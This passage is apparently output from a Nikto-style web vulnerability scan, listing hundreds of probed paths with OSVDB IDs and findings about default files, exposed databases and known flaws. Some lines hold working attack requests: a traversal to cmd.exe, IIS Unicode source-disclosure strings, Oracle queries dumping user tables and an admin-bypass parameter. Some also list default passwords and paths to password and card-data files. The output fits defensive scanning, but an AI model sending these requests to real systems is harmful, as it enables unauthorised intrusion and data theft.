5056+ OSVDB-3093: /pvote/add.php?question=AmIgAy&o1=yes&o2=yeah&o3=well..yeah&o4=bad%20: This might be interesting... has been seen in web logs from an unknown scanner.
5057+ OSVDB-3093: /pvote/del.php?pollorder=1%20: This might be interesting... has been seen in web logs from an unknown scanner.
5058+ OSVDB-3093: /quikmail/nph-emumail.cgi?type=../%00: This might be interesting... has been seen in web logs from an unknown scanner.
5059+ OSVDB-3093: /room/save_item.php: This might be interesting... has been seen in web logs from an unknown scanner.
5060+ OSVDB-3093: /scripts/tradecli.dll: This might be interesting... has been seen in web logs from an unknown scanner.
5061+ OSVDB-3093: /scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir: This might be interesting... has been seen in web logs from an unknown scanner.
5062+ OSVDB-3093: /security/web_access.html: This might be interesting... has been seen in web logs from an unknown scanner.
5063+ OSVDB-3093: /servers/link.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
5064+ OSVDB-3093: /shop/php_files/site.config.php+: This might be interesting... has been seen in web logs from an unknown scanner.
5065+ OSVDB-3093: /shop/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
5066+ OSVDB-3093: /shop/show.php: This might be interesting... has been seen in web logs from an unknown scanner.
5067+ OSVDB-3093: /Site/biztalkhttpreceive.dll: This might be interesting... has been seen in web logs from an unknown scanner.
5068+ OSVDB-3093: /staticpages/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
5069+ OSVDB-3093: /supporter/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
5070+ OSVDB-3093: /supporter/tupdate.php: This might be interesting... has been seen in web logs from an unknown scanner.
5071+ OSVDB-3093: /technote/print.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
5072+ OSVDB-3093: /texis/websearch/phine: This might be interesting... has been seen in web logs from an unknown scanner.
5073+ OSVDB-3093: /topic/entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
5074+ OSVDB-3093: /topsitesdir/edit.php: This might be interesting... has been seen in web logs from an unknown scanner.
5075+ OSVDB-3093: /ttforum/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
5076+ OSVDB-3093: /tutos/file/file_new.php: This might be interesting... has been seen in web logs from an unknown scanner.
5077+ OSVDB-3093: /tutos/file/file_select.php: This might be interesting... has been seen in web logs from an unknown scanner.
5078+ OSVDB-3093: /typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
5079+ OSVDB-3093: /cms/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
5080+ OSVDB-3093: /site/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
5081+ OSVDB-3093: /typo/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
5082+ OSVDB-3093: /typo3/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
5083+ OSVDB-3093: /uifc/MultFileUploadHandler.php+: This might be interesting... has been seen in web logs from an unknown scanner.
5084+ OSVDB-3093: /utils/sprc.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
5085+ OSVDB-3093: /VBZooM/add-subject.php: This might be interesting... has been seen in web logs from an unknown scanner.
5086+ OSVDB-3093: /wbboard/profile.php: This might be interesting... has been seen in web logs from an unknown scanner.
5087+ OSVDB-3093: /wbboard/reply.php: This might be interesting... has been seen in web logs from an unknown scanner.
5088+ OSVDB-3093: /webcalendar/login.php: This might be interesting... has been seen in web logs from an unknown scanner.
5089+ OSVDB-3093: /webcalendar/view_m.php: This might be interesting... has been seen in web logs from an unknown scanner.
5090+ OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
5091+ OSVDB-3093: /web_app/WEB-INF/webapp.properties: This might be interesting... has been seen in web logs from an unknown scanner.
5092+ OSVDB-3093: /XMBforum/buddy.php: This might be interesting... has been seen in web logs from an unknown scanner.
5093+ OSVDB-3093: /XMBforum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
5094+ OSVDB-3093: /yabbse/Reminder.php: This might be interesting... has been seen in web logs from an unknown scanner.
5095+ OSVDB-3093: /yabbse/Sources/Packages.php: This might be interesting... has been seen in web logs from an unknown scanner.
5096+ OSVDB-3093: /zentrack/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
5097+ OSVDB-3093: /ows-bin/oaskill.exe?abcde.exe: This might be interesting... has been seen in web logs from an unknown scanner.
5098+ OSVDB-3093: /ows-bin/oasnetconf.exe?-l%20-s%20BlahBlah: This might be interesting... has been seen in web logs from an unknown scanner.
5099+ OSVDB-3093: /database/: Databases? Really??
5100+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
5101+ OSVDB-3233: /jservdocs/: Default Apache JServ docs should be removed.
5102+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
5103+ OSVDB-3233: /akopia/: Akopia is installed.
5104+ OSVDB-3233: /ojspdemos/basic/hellouser/hellouser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
5105+ OSVDB-3233: /ojspdemos/basic/simple/usebean.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
5106+ OSVDB-3233: /ojspdemos/basic/simple/welcomeuser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
5107+ OSVDB-3233: /php/index.php: Monkey Http Daemon default PHP file found.
5108+ OSVDB-3233: /servlet/Counter: JRun default servlet found. All default code should be removed from servers.
5109+ OSVDB-3233: /servlet/DateServlet: JRun default servlet found. All default code should be removed from servers.
5110+ OSVDB-3233: /servlet/FingerServlet: JRun default servlet found. All default code should be removed from servers.
5111+ OSVDB-3233: /servlet/HelloWorldServlet: JRun default servlet found. All default code should be removed from servers.
5112+ OSVDB-3233: /servlet/SessionServlet: JRun or Netware WebSphere default servlet found. All default code should be removed from servers.
5113+ OSVDB-3233: /servlet/SimpleServlet: JRun default servlet found (possibly Websphere). All default code should be removed from servers.
5114+ OSVDB-3233: /servlet/SnoopServlet: JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.
5115+ OSVDB-3233: /admcgi/contents.htm: Default FrontPage CGI found.
5116+ OSVDB-3233: /admcgi/scripts/Fpadmcgi.exe: Default FrontPage CGI found.
5117+ OSVDB-3233: /admisapi/fpadmin.htm: Default FrontPage file found.
5118+ OSVDB-3233: /bin/admin.pl: Default FrontPage CGI found.
5119+ OSVDB-3233: /bin/cfgwiz.exe: Default FrontPage CGI found.
5120+ OSVDB-3233: /bin/CGImail.exe: Default FrontPage CGI found.
5121+ OSVDB-3233: /bin/contents.htm: Default FrontPage CGI found.
5122+ OSVDB-3233: /bin/fpadmin.htm: Default FrontPage CGI found.
5123+ OSVDB-3233: /bin/fpremadm.exe: Default FrontPage CGI found.
5124+ OSVDB-3233: /bin/fpsrvadm.exe: Default FrontPage CGI found.
5125+ OSVDB-3233: /cgi-bin/admin.pl: Default FrontPage CGI found.
5126+ OSVDB-3233: /cgi-bin/cfgwiz.exe: Default FrontPage CGI found.
5127+ OSVDB-3233: /cgi-bin/CGImail.exe: Default FrontPage CGI found.
5128+ OSVDB-3233: /cgi-bin/contents.htm: Default FrontPage CGI found.
5129+ OSVDB-3233: /cgi-bin/fpadmin.htm: Default FrontPage CGI found.
5130+ OSVDB-3233: /cgi-bin/fpremadm.exe: Default FrontPage CGI found.
5131+ OSVDB-3233: /cgi-bin/fpsrvadm.exe: Default FrontPage CGI found.
5132+ OSVDB-3233: /scripts/admin.pl: Default FrontPage CGI found.
5133+ OSVDB-3233: /scripts/cfgwiz.exe: Default FrontPage CGI found.
5134+ OSVDB-3233: /scripts/CGImail.exe: Default FrontPage CGI found.
5135+ OSVDB-3233: /scripts/contents.htm: Default FrontPage CGI found.
5136+ OSVDB-3233: /scripts/fpadmin.htm: Default FrontPage CGI found.
5137+ OSVDB-3233: /scripts/fpcount.exe: Default FrontPage CGI found.
5138+ OSVDB-3233: /scripts/fpremadm.exe: Default FrontPage CGI found.
5139+ OSVDB-3233: /scripts/fpsrvadm.exe: Default FrontPage CGI found.
5140+ OSVDB-3233: /_private/: FrontPage directory found.
5141+ OSVDB-3233: /_private/orders.htm: Default FrontPage file found.
5142+ OSVDB-3233: /_private/orders.txt: Default FrontPage file found.
5143+ OSVDB-3233: /_private/register.htm: Default FrontPage file found.
5144+ OSVDB-3233: /_private/register.txt: Default FrontPage file found.
5145+ OSVDB-3233: /_private/registrations.txt: Default FrontPage file found.
5146+ OSVDB-3233: /_private/_vti_cnf/: FrontPage directory found.
5147+ OSVDB-3233: /_vti_bin/: FrontPage directory found.
5148+ OSVDB-3233: /_vti_bin/admin.pl: Default FrontPage CGI found.
5149+ OSVDB-3233: /_vti_bin/cfgwiz.exe: Default FrontPage CGI found.
5150+ OSVDB-3233: /_vti_bin/CGImail.exe: Default FrontPage CGI found.
5151+ OSVDB-3233: /_vti_bin/contents.htm: Default FrontPage CGI found.
5152+ OSVDB-3233: /_vti_bin/fpadmin.htm: Default FrontPage CGI found.
5153+ OSVDB-3233: /_vti_bin/fpremadm.exe: Default FrontPage CGI found.
5154+ OSVDB-3233: /_vti_bin/fpsrvadm.exe: Default FrontPage CGI found.
5155+ OSVDB-3233: /_vti_bin/_vti_cnf/: FrontPage directory found.
5156+ OSVDB-3233: /_vti_cnf/_vti_cnf/: FrontPage directory found.
5157+ OSVDB-3233: /_vti_log/_vti_cnf/: FrontPage directory found.
5158+ OSVDB-3233: /_vti_pvt/administrators.pwd: Default FrontPage file found, may be a password file.
5159+ OSVDB-3233: /_vti_pvt/authors.pwd: Default FrontPage file found, may be a password file.
5160+ OSVDB-3233: /_vti_pvt/service.pwd: Default FrontPage file found, may be a password file.
5161+ OSVDB-3233: /_vti_pvt/users.pwd: Default FrontPage file found, may be a password file.
5162+ OSVDB-3233: /help/contents.htm: Default Netscape manual found. All default pages should be removed.
5163+ OSVDB-3233: /help/home.html: Default Netscape manual found. All default pages should be removed.
5164+ OSVDB-3233: /manual/ag/esperfrm.htm: Default Netscape manual found. All default pages should be removed.
5165+ OSVDB-3233: /nethome/: Netscape Enterprise Server default doc/manual directory. Reveals server path at bottom of page.
5166+ OSVDB-3233: /com/novell/gwmonitor/help/en/default.htm: Netware gateway monitor access documentation found. All default documentation should be removed from web servers.
5167+ OSVDB-3233: /com/novell/webaccess/help/en/default.htm: Netware web access documentation found. All default documentation should be removed from web servers.
5168+ OSVDB-3233: /com/novell/webpublisher/help/en/default.htm: Netware web publisher documentation found. All default documentation should be removed from web servers.
5169+ OSVDB-3233: /servlet/AdminServlet: Netware Web Search Server (adminservlet) found. All default code should be removed from web servers.
5170+ OSVDB-3233: /servlet/gwmonitor: Netware Gateway monitor found. All default code should be removed from web servers.
5171+ OSVDB-3233: /servlet/PrintServlet: Novell Netware default servlet found. All default code should be removed from the system.
5172+ OSVDB-3233: /servlet/SearchServlet: Novell Netware default servlet found. All default code should be removed from the system.
5173+ OSVDB-3233: /servlet/ServletManager: Netware Java Servlet Gateway found. Default user ID is servlet, default password is manager. All default code should be removed from Internet servers.
5174+ OSVDB-3233: /servlet/sq1cdsn: Novell Netware default servlet found. All default code should be removed from the system.
5175+ OSVDB-3233: /servlet/sqlcdsn: Netware SQL connector found. All default code should be removed from web servers.
5176+ OSVDB-3233: /servlet/webacc: Netware Enterprise and/or GroupWise web access found. All default code should be removed from Internet servers.
5177+ OSVDB-3233: /servlet/webpub: Netware Web Publisher found. All default code should be removed from web servers.
5178+ OSVDB-3233: /WebSphereSamples: Netware Webshere sample applications found. All default code should be removed from web servers.
5179+ OSVDB-3233: /doc/domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
5180+ OSVDB-3233: /doc/dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
5181+ OSVDB-3233: /doc/help4.nsf: This documentation database can be read without authentication. All default files should be removed.
5182+ OSVDB-3233: /doc/helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
5183+ OSVDB-3233: /doc/helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
5184+ OSVDB-3233: /doc/internet.nsf: This documentation database can be read without authentication. All default files should be removed.
5185+ OSVDB-3233: /doc/javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
5186+ OSVDB-3233: /doc/lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
5187+ OSVDB-3233: /doc/migrate.nsf: This documentation database can be read without authentication. All default files should be removed.
5188+ OSVDB-3233: /doc/npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
5189+ OSVDB-3233: /doc/npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
5190+ OSVDB-3233: /doc/readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
5191+ OSVDB-3233: /doc/readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
5192+ OSVDB-3233: /doc/smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
5193+ OSVDB-3233: /doc/srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
5194+ OSVDB-3233: /help/domguide.nsf: This documentation database can be read without authentication. All default files should be removed.
5195+ OSVDB-3233: /help/dspug.nsf: This documentation database can be read without authentication. All default files should be removed.
5196+ OSVDB-3233: /help/help4.nsf: This documentation database can be read without authentication. All default files should be removed.
5197+ OSVDB-3233: /help/helpadmin.nsf: This documentation database can be read without authentication. All default files should be removed.
5198+ OSVDB-3233: /help/helplt4.nsf: This documentation database can be read without authentication. All default files should be removed.
5199+ OSVDB-3233: /help/internet.nsf: This documentation database can be read without authentication. All default files should be removed.
5200+ OSVDB-3233: /help/javapg.nsf: This documentation database can be read without authentication. All default files should be removed.
5201+ OSVDB-3233: /help/lccon.nsf: This documentation database can be read without authentication. All default files should be removed.
5202+ OSVDB-3233: /help/migrate.nsf: This documentation database can be read without authentication. All default files should be removed.
5203+ OSVDB-3233: /help/npn_admn.nsf: This documentation database can be read without authentication. All default files should be removed.
5204+ OSVDB-3233: /help/npn_rn.nsf: This documentation database can be read without authentication. All default files should be removed.
5205+ OSVDB-3233: /help/readmec.nsf: This documentation database can be read without authentication. All default files should be removed.
5206+ OSVDB-3233: /help/readmes.nsf: This documentation database can be read without authentication. All default files should be removed.
5207+ OSVDB-3233: /help/smhelp.nsf: This documentation database can be read without authentication. All default files should be removed.
5208+ OSVDB-3233: /help/srvinst.nsf: This documentation database can be read without authentication. All default files should be removed.
5209+ OSVDB-3233: /iissamples/sdk/asp/docs/codebrw2.asp: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5210+ OSVDB-3233: /iissamples/sdk/asp/docs/codebrws.asp: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5211+ OSVDB-3233: /iissamples/sdk/asp/docs/Winmsdp.exe: This is a default IIS script/file that should be removed. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5212+ OSVDB-3233: /a/: May be Kebi Web Mail administration menu.
5213+ OSVDB-3233: /basilix/: BasiliX webmail application. Default mysql database name is 'BASILIX' with password 'bsxpass'
5214+ OSVDB-3233: /interchange/: Interchange chat is installed. Look for a high-numbered port like 20xx to find it running.
5215+ OSVDB-3284: /iissamples/sdk/asp/docs/Winmsdp.exe?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example Winmsdp.exe file. Remove all default files from the web root. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5216+ OSVDB-3396: /php/mlog.html: Remote file read vulnerability 1999-0346
5217+ OSVDB-3396: /php/mlog.phtml: Remote file read vulnerability 1999-0346
5218+ OSVDB-3489: /surf/scwebusers: SurfControl SuperScout Web Reports Server user and password file is available. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0705.
5219+ OSVDB-3501: /_private/form_results.htm: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052.
5220+ OSVDB-3501: /_private/form_results.html: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052.
5221+ OSVDB-3501: /_private/form_results.txt: This file may contain information submitted by other web users via forms. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1052.
5222+ OSVDB-3512: /scripts/tools/getdrvrs.exe: MS Jet database engine can be used to make DSNs, useful with an ODBC exploit and the RDS exploit (with msadcs.dll) which mail allow command execution. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm).
5223+ OSVDB-3591: /project/index.php?m=projects&user_cookie=1: dotProject 0.2.1.5 may allow admin login bypass by adding the user_cookie=1 to the URL.
5224+ OSVDB-379: /site/eg/source.asp: This ASP (installed with Apache::ASP) allows attackers to upload files to the server. Upgrade to 1.95 or higher. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0628.
5225+ OSVDB-4: /iissamples/exair/search/advsearch.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
5226+ OSVDB-4013: /isqlplus: Oracle iSQL*Plus is installed. This may be vulnerable to a buffer overflow in the user ID field. http://www.ngssoftware.com/advisories/ora-isqlplus.txt
5227+ OSVDB-4161: /data/member_log.txt: Teekai's forum full 1.2 member's log can be retrieved remotely.
5228+ OSVDB-4161: /data/userlog/log.txt: Teekai's Tracking Online 1.0 log can be retrieved remotely.
5229+ OSVDB-4171: /ASP/cart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
5230+ OSVDB-4171: /database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
5231+ OSVDB-4171: /mcartfree/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
5232+ OSVDB-4171: /metacart/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
5233+ OSVDB-4171: /shop/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
5234+ OSVDB-4171: /shoponline/fpdb/shop.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
5235+ OSVDB-4171: /shopping/database/metacart.mdb: MetaCart2 is an ASP shopping cart. The database of customers is available via the web.
5236+ OSVDB-4238: /admin/adminproc.asp: Xpede administration page may be available. The /admin directory should be protected.
5237+ OSVDB-4239: /admin/datasource.asp: Xpede page reveals SQL account name. The /admin directory should be protected.
5238+ OSVDB-4240: /utils/sprc.asp: Xpede page may allow SQL injection.
5239+ OSVDB-4360: /acart2_0/acart2_0.mdb: Alan Ward A-Cart 2.0 allows remote user to read customer database file which may contain usernames, passwords, credit cards and more.
5240+ OSVDB-4361: /acart2_0/admin/category.asp: Alan Ward A-Cart 2.0 is vulnerable to an XSS attack which may cause the administrator to delete database information.
5241+ OSVDB-474: /Sites/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5242+ OSVDB-474: /Sites/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5243+ OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspired/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5244+ OSVDB-474: /Sites/Samples/Knowledge/Membership/Inspiredtutorial/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5245+ OSVDB-474: /Sites/Samples/Knowledge/Push/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5246+ OSVDB-474: /Sites/Samples/Knowledge/Search/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5247+ OSVDB-474: /SiteServer/Publishing/ViewCode.asp: The default ViewCode.asp can allow an attacker to read any file on the machine. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0737. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5248+ OSVDB-17671: /siteserver/publishing/viewcode.asp?source=/default.asp: May be able to view source code using Site Server vulnerability.
5249+ OSVDB-4908: /securelogin/1,2345,A,00.html: Vignette Story Server v4.1, 6, may disclose sensitive information via a buffer overflow.
5250+ OSVDB-5095: /sysuser/docmgr/ieedit.stm?url=../: Sambar default file may allow directory listings.
5251+ OSVDB-5096: /sysuser/docmgr/iecreate.stm?template=../: Sambar default file may allow directory listings.
5252+ OSVDB-539: /catinfo: May be vulnerable to a buffer overflow. Request '/catinfo?' and add on 2048 of garbage to test.
5253+ OSVDB-5407: /soap/servlet/soaprouter: Oracle 9iAS SOAP components allow anonymous users to deploy applications by default.
5254+ OSVDB-5523: /MWS/HandleSearch.html?searchTarget=test&B1=Submit: MyWebServer 1.0.2 may be vulnerable to a buffer overflow (untested). Upgrade to a later version if 990b of searched data crashes the server.
5255+ OSVDB-562: /server-info: This gives a lot of Apache information. Comment out appropriate line in httpd.conf or restrict access to allowed hosts.
5256+ OSVDB-596: /dc/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
5257+ OSVDB-596: /dc/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
5258+ OSVDB-596: /dcshop/auth_data/auth_user_file.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
5259+ OSVDB-596: /dcshop/orders/orders.txt: The DCShop installation allows credit card numbers to be viewed remotely. See dcscripts.com for fix information.
5260+ OSVDB-6666: /cgi-bin/hpnst.exe?c=p+i=SrvSystemInfo.html: HP Instant TopTools GoAhead WebServer hpnst.exe may be vulnerable to a DoS.
5261+ OSVDB-6672: /_layouts/alllibs.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
5262+ OSVDB-6672: /_layouts/settings.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
5263+ OSVDB-6672: /_layouts/userinfo.htm: Microsoft SharePoint Portal and Team Services vulnerable to NT or NTLM authentication bypass on Win2000 SP4 using IE 6.x. Bugtraq 03-11-19 post by arkanian@hacker.am
5264+ OSVDB-670: /stronghold-info: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. This gives information on configuration. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0868.
5265+ OSVDB-670: /stronghold-status: Redhat Stronghold from versions 2.3 up to 3.0 discloses sensitive information. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0868.
5266+ OSVDB-7: /iissamples/exair/howitworks/Code.asp: Scripts within the Exair package on IIS 4 can be used for a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
5267+ OSVDB-7: /iissamples/exair/howitworks/Codebrw1.asp: This is a default IIS script/file which should be removed, it may allow a DoS against the server. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0738. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0449. BID-193.
5268+ OSVDB-789: /iissamples/sdk/asp/docs/CodeBrws.asp?Source=/IISSAMPLES/%c0%ae%c0%ae/default.asp: IIS may be vulnerable to source code viewing via the example CodeBrws.asp file. Remove all default files from the web root. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-0739. http://www.microsoft.com/technet/security/bulletin/MS99-013.asp.
5269+ OSVDB-9624: /admin/admin.php?adminpy=1: PY-Membres 4.2 may allow administrator access.
5270+ OSVDB-3092: /README: README file found.
5271+ OSVDB-3233: /j2ee/: j2ee directory found--possibly an Oracle app server directory.
5272+ OSVDB-32333: /webcache/: Oracle WebCache Demo
5273+ OSVDB-3233: /webcache/webcache.xml: Oracle WebCache Demo
5274+ OSVDB-3233: /bmp/: SQLJ Demo Application
5275+ OSVDB-3233: /bmp/global-web-application.xml: SQLJ Demo Application
5276+ OSVDB-3233: /bmp/JSPClient.java: SQLJ Demo Application
5277+ OSVDB-3233: /bmp/mime.types: SQLJ Demo Application
5278+ OSVDB-3233: /bmp/README.txt: SQLJ Demo Application
5279+ OSVDB-3233: /bmp/sqljdemo.jsp: SQLJ Demo Application
5280+ OSVDB-3233: /bmp/setconn.jsp: SQLJ Demo Application
5281+ OSVDB-3233: /OA_HTML/oam/weboam.log: Oracle log files.
5282+ OSVDB-3233: /webapp/admin/_pages/_bc4jadmin/: Oracle JSP files
5283+ OSVDB-3233: /_pages/_webapp/_admin/_showpooldetails.java: Oracle JSP files
5284+ OSVDB-3233: /_pages/_webapp/_admin/_showjavartdetails.java: Oracle JSP file
5285+ OSVDB-3233: /_pages/_demo/: Oracle JSP file
5286+ OSVDB-3233: /_pages/_webapp/_jsp/: Oracle JSP file.
5287+ OSVDB-3233: /_pages/_demo/_sql/: Oracle JSP file.
5288+ OSVDB-3233: /OA_HTML/_pages/: Oracle JSP file.
5289+ OSVDB-3233: /OA_HTML/webtools/doc/index.html: Cabo DHTML Components Help Page
5290+ OSVDB-18114: /reports/rwservlet?server=repserv+report=/tmp/hacker.rdf+destype=cache+desformat=PDF: Oracle Reports rwservlet report Variable Arbitrary Report Executable Execution
5291+ OSVDB-3233: /apex/: Oracle Application Express login screen.
5292+ OSVDB-3233: /OA_JAVA/: Oracle Applications Portal Page
5293+ OSVDB-3233: /OA_HTML/: Oracle Applications Portal Page
5294+ OSVDB-3233: /servlets/weboam/oam/oamLogin: Oracle Application Manager
5295+ OSVDB-3233: /OA_HTML/PTB/mwa_readme.htm: Oracle Mobile Applications Industrial Server administration and configuration inerface
5296+ OSVDB-3233: /reports/rwservlet: Oracle Reports
5297+ OSVDB-3233: /reports/rwservlet/showenv: Oracle Reports
5298+ OSVDB-3233: /reports/rwservlet/showmap: Oracle Reports
5299+ OSVDB-3233: /reports/rwservlet/showjobs: Oracle Reports
5300+ OSVDB-3233: /reports/rwservlet/getjobid7?server=myrep: Oracle Reports
5301+ OSVDB-3233: /reports/rwservlet/getjobid4?server=myrep: Oracle Reports
5302+ OSVDB-3233: /reports/rwservlet/showmap?server=myserver: Oracle Reports
5303+ OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select: Direct access to Oracle packages could have an unkown impact.
5304+ OSVDB-3093: /pls/portal/owa_util.listprint?p_theQuery=select: Access to Oracle pages could have an unknown impact.
5305+ OSVDB-3093: /pls/portal/owa_util.show_query_columns?ctable=sys.dba_users: Access to Oracle pages could have an unknown impact.
5306+ OSVDB-3093: /pls/portal/owa_util.showsource?cname=owa_util: Access to Oracle pages could have an unknown impact.
5307+ OSVDB-3093: /pls/portal/owa_util.cellsprint?p_theQuery=select+*+from+sys.dba_users: Access to Oracle pages could have an unknown impact.
5308+ OSVDB-3093: /pls/portal/owa_util.signature: Access to Oracle pages could have an unknown impact.
5309+ OSVDB-3093: /pls/portal/HTP.PRINT: Access to Oracle pages could have an unknown impact.
5310+ OSVDB-3093: /pls/portal/CXTSYS.DRILOAD.VALIDATE_STMT: Access to Oracle pages could have an unknown impact.
5311+ OSVDB-3093: /pls/portal/PORTAL_DEMO.ORG_CHART.SHOW: Access to Oracle pages could have an unknown impact.
5312+ OSVDB-3093: /pls/portal/PORTAL.wwv_form.genpopuplist: Access to Oracle pages cold have an unknown impact.
5313+ OSVDB-3093: /pls/portal/PORTAL.wwv_ui_lovf.show: Access to Oracle pages could have an unknown impact.
5314+ OSVDB-3093: /pls/portal/PORTAL.wwa_app_module.link: Access to Oracle pages could have an unknown impact.
5315+ OSVDB-3093: /pls/portal/PORTAL.wwv_dynxml_generator.show: Access to Oracle pages could have an unknown impact.
5316+ OSVDB-3093: /pls/portal/PORTAL.home: Access to Oracle pages could have an unknown impact.
5317+ OSVDB-3093: /pls/portal/PORTAL.wwv_setting.render_css: Access to Oracle pages could have an unknown impact.
5318+ OSVDB-3093: /pls/portal/PORTAL.wwv_main.render_warning_screen?p_oldurl=inTellectPRO&p_newurl=inTellectPRO: Access to Oracle pages could have an unknown impact.
5319+ OSVDB-3093: /pls/portal/SELECT: Access to Oracle pages could have an unknown impact.
5320+ OSVDB-3093: /pls/portal/null: Access to Oracle pages could have an unknown impact.
5321+ OSVDB-3093: /OA_MEDIA/: Oracle Applications portal pages found.
5322+ OSVDB-3093: /OA_HTML/META-INF/: Oracle Applications portal pages found.
5323+ OSVDB-3093: /OA_HTML/jsp/por/services/login.jsp: Oracle Applications portal pages found.
